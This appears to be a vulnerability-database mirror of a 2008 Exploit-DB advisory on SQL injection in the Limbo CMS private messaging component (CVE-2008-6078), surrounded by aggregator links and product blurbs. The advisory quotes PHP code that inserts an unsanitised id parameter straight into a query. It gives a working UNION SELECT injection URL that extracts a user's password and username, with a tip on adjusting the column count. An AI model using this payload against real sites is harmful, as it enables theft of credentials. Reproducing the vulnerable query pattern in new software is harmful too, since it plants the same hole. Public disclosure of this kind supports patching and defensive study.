Lucene search
+L

Limbo CMS - Private Messaging Component SQL Injection

🗓️ 21 Oct 2008 00:00:00Reported by StAkeRType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 44 Views

Limbo CMS private messaging SQL Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6078
21 Oct 200800:00
circl
cve
CVE
CVE-2008-6078
6 Feb 200911:00
cve
cvelist
Cvelist
CVE-2008-6078
6 Feb 200911:00
cvelist
euvd
EUVD
EUVD-2008-6048
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6078
6 Feb 200911:30
nvd
prion
Prion
Sql injection
6 Feb 200911:30
prion
/*

   Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability
   --------------------------------------------------------------------------
   StAkeR[at]hotmail[dot]it
   http://www.limboportal.com/index.php/option/downloads/task/download/id/108
   --------------------------------------------------------------------------

   com_privmsg/open.php

   31. if (isset($_GET['status']))
   32. {
   33. 	  header('Location:index.php?option=pms&page=open&id='.$_GET['id'].'');
   34. }
   35.
   36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'");
   37.


   - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/*

   (Syntax Error) Change number of columns (Ex: 0,0,0,username,password)



*/

# milw0rm.com [2008-10-21]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00967
44